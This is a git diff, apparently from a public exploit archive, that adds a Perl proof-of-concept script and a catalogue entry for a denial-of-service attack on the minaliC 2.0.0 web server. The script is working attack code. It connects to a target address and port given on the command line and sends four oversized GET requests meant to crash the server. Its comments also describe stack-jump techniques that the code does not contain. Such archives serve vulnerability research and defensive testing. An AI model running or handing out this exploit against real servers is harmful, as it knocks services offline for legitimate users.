diff --git a/exploits/windows/remote/51917.pl b/exploits/windows/remote/51917.pl new file mode 100755 index 000000000..c04704122 --- /dev/null +++ b/exploits/windows/remote/51917.pl @@ -0,0 +1,85 @@ +#!/usr/bin/perl + + +use Socket; + +# Exploit Title: minaliC 2.0.0 - Denial of Service (DoS) +# Discovery by: Fernando Mengali +# Discovery Date: 03 january 2024 +# Vendor Homepage: http://minalic.sourceforge.net/ +# Notification vendor: No reported +# Tested Version: minaliC 2.0.0 +# Tested on: Window XP Professional - Service Pack 2 and 3 - English +# Vulnerability Type: Denial of Service (DoS) +# VĂ­deo: https://www.youtube.com/watch?v=R_gkEjvpJNw + +#1. Description + +#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English). +#For this exploit I have tried several strategies to increase reliability and performance: +#Jump to a static 'call esp' +#Backwards jump to code a known distance from the stack pointer. +#The server did not properly handle request with large amounts of data via method GET to web server. +#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions. +#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. + +#2. Proof of Concept - PoC + + $sis="$^O"; + + if ($sis eq "windows"){ + $cmd="cls"; + } else { + $cmd="clear"; + } + + system("$cmd"); + + intro(); + main(); + + print "[+] Exploiting... \n"; + +my $junk = "\x41" x 245; + +my $host = "\x41" x 135; +my $i=0; +while ($i <= 3) { +my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n"; + +my $sock; +socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n"; + +my $addr = sockaddr_in($port, inet_aton($ip)); +connect($sock, $addr); + +send($sock, $buf, length($buf), 0); + +$i++; + +} + + print "[+] Done - Exploited success!!!!!\n\n"; + + sub intro { + print "***************************************************\n"; + print "* minaliC 2.0.0 - Denied of Service *\n"; + print "* *\n"; + print "* Coded by Fernando Mengali *\n"; + print "* *\n"; + print "* e-mail: fernando.mengalli\@gmail.com *\n"; + print "* *\n"; + print "***************************************************\n"; + } + + sub main { + +our ($ip, $port) = @ARGV; + + unless (defined($ip) && defined($port)) { + + print " \nUsage: $0 \n"; + exit(-1); + + } + } \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2f9486d79..74856013b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44421,6 +44421,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31345,exploits/windows/remote/31345.txt,"Microworld eScan Server 9.0.742 - Directory Traversal",2008-03-06,"Luigi Auriemma",remote,windows,,2008-03-06,2014-02-02,1,CVE-2008-1221;OSVDB-43065,,,,,https://www.securityfocus.com/bid/28127/info 6407,exploits/windows/remote/6407.c,"Microworld Mailscan 5.6.a - Password Reveal",2008-09-09,SlaYeR,remote,windows,,2008-09-08,,1,,,,,, 45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,,2018-08-09,2018-08-09,0,,,,,, +51917,exploits/windows/remote/51917.pl,"minaliC 2.0.0 - Denied of Service",2024-03-22,"Fernando Mengali",remote,windows,,2024-03-22,2024-03-22,0,,,,,, 15333,exploits/windows/remote/15333.txt,"MinaliC WebServer 1.0 - Directory Traversal",2010-10-27,"John Leitch",remote,windows,,2010-10-27,2010-10-27,1,OSVDB-68880,,,http://www.exploit-db.com/screenshots/idlt15500/screen-shot-2010-10-27-at-52840-pm.png,, 15336,exploits/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure / File Download",2010-10-27,Dr_IDE,remote,windows,,2010-10-27,2017-10-27,1,,,,,, 17578,exploits/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,remote,windows,,2011-07-27,2011-07-29,1,OSVDB-74149,,,,http://www.exploit-db.comminalic.zip,